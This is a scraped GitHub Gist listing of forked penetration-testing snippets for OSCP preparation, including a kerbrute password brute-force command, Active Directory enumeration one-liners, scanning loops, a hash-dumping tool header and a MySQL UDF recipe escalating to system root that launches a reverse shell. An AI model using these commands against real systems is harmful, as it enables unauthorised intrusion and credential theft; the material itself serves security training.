With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
AnonymousQuebec AnonQuebec
AnonQuebec
/ Hacking OSCP
Last active
January 15, 2025 00:12
— forked from rahmiy/Hacking OSCP
OSCP Prep class
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| OSCP Prep class | |
| Day 1: Exploit Research | |
| http://www.securitytube.net/groups?operation=view&groupId=7 | |
| Day 2: Python Hacking | |
| https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (videos 1-10 if you are a complete beginner) | |
| https://www.youtube.com/playlist?list=PL1A2CSdiySGLtKwqBnqj9BON6QQjWkP4n (entire playlist) | |
AnonQuebec
/ asn
Created
January 15, 2025 00:11
— forked from rahmiy/asn
ASN/IP/Route/hostname command line lookup tool to map any network to the corresponding ASN and prefix
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ############################################################################################################ | |
| # ---------------------------------------------------------------------- | |
| # ASN/IPv4/Prefix lookup tool. Uses Team Cymru's whois service for data. | |
| # ---------------------------------------------------------------------- | |
| # example usage: | |
| # asn <ASnumber> -- to lookup matching ASN data. Supports "as123" and "123" formats (case insensitive) | |
| # asn <IP.AD.DR.ESS> -- to lookup matching route and ASN data | |
| # asn <ROUTE> -- to lookup matching ASN data |
AnonQuebec
/ 7d82ef55ea5f59a09c42d4c423a6e0ea33731c7e0d1f59509df390656377fea2
Created
January 15, 2025 00:11
— forked from rahmiy/7d82ef55ea5f59a09c42d4c423a6e0ea33731c7e0d1f59509df390656377fea2
https://www.virustotal.com/#/file/7d82ef55ea5f59a09c42d4c423a6e0ea33731c7e0d1f59509df390656377fea2/detection
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. | |
| # | |
| # This software is provided under a slightly modified version | |
| # of the Apache Software License. See the accompanying LICENSE file | |
| # for more information. | |
| # | |
| # Description: Performs various techniques to dump hashes from the | |
| # remote machine without executing any agent there. | |
| # For SAM and LSA Secrets (including cached creds) | |
| # we try to read as much as we can from the registry |
AnonQuebec
/ kerberos_attacks_cheatsheet.md
Created
January 15, 2025 00:11
— forked from rahmiy/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
AnonQuebec
/ install.sh
Created
January 15, 2025 00:11
— forked from rahmiy/install.sh
pentest setup backup shell script to install sublime,typora,shellter,wine,figlet,lolcat,gobuster automatically using linux commands #oscp #pentest #documentation #tools
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ##### (Cosmetic) Colour output | |
| RED="\033[01;31m" # Issues/Errors | |
| GREEN="\033[01;32m" # Success | |
| YELLOW="\033[01;33m" # Warnings/Information | |
| BLUE="\033[01;34m" # Heading | |
| BOLD="\033[01;01m" # Highlight | |
| RESET="\033[00m" # Normal |
AnonQuebec
/ 1) Active Directory One Liners
Created
January 15, 2025 00:11
— forked from rahmiy/1) Active Directory One Liners
Some Pentesting Notes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts | |
| ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | |
| Grab Forest Trusts. | |
| ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() | |
AnonQuebec
/ buffers.sh
Created
January 15, 2025 00:11
— forked from rahmiy/buffers.sh
gerate unique string and eip in one place .run buffer overflow e
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ##### (Cosmetic) Colour output | |
| RED="\033[01;31m" # Issues/Errors | |
| GREEN="\033[01;32m" # Success | |
| YELLOW="\033[01;33m" # Warnings/Information | |
| BLUE="\033[01;34m" # Heading | |
| BOLD="\033[01;01m" # Highlight | |
| RESET="\033[00m" # Normal | |
| echo -e "${GREEN}" | |
| ##################################installation starts ###################################### |
AnonQuebec
/ Automating scanning with fish shell
Created
January 15, 2025 00:10
— forked from rahmiy/Automating scanning with fish shell
Automating scanning with fish shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| =======================HOST DISCOVERY=========================================== | |
| Host discovery con PING: | |
| $ for octect in (seq 0 254) | |
| echo "Pinging [X.X.X.$octect]" | |
| ping -c 2 10.150.150.$octect | grep "bytes from" | awk '{print $4}' | uniq -d | cut -d ":" -f 1 | tee -a targets.list | |
| end | |
| Host discovery con NMAP IMCP o ARP | |
| $sudo nmap -vv -sn -PE 10.150.150.0/24 -oG HOSTDISCOVERY_ICMP.gnmap |
AnonQuebec
/ cis_centos7_hardening.sh
Created
January 15, 2025 00:10
— forked from rahmiy/cis_centos7_hardening.sh
Hardening CentOS 7 CIS script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| MODPROBEFILE="/etc/modprobe.d/CIS.conf" | |
| #MODPROBEFILE="/tmp/CIS.conf" | |
| ANSWER=0 | |
| analyze_part () { | |
| if [ "$#" != "1" ]; then | |
| options="$(echo $@ | awk 'BEGIN{FS="[()]"}{print $2}')" | |
| echo "[+]$@" | |
| apply_part_rule $1 |
AnonQuebec
/ mysql_root_to_system_root
Created
January 15, 2025 00:09
— forked from rahmiy/mysql_root_to_system_root
#pentest #recipe: mysql root -> system root (linux)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # download lib_mysqludf_sys.so from https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql | |
| # (currently not present in kali's sqlmap, only the windows one, the same for metasploit...) | |
| mysql> use mysql; | |
| mysql> create table test(line blob); | |
| mysql> insert into test values(load_file('/tmp/lib_mysqludf_sys.so')); | |
| mysql> select * from test into dumpfile '/usr/lib/lib_mysqludf_sys.so'; | |
| mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; | |
| mysql> select sys_exec('./reverse_shell &'); |
NewerOlder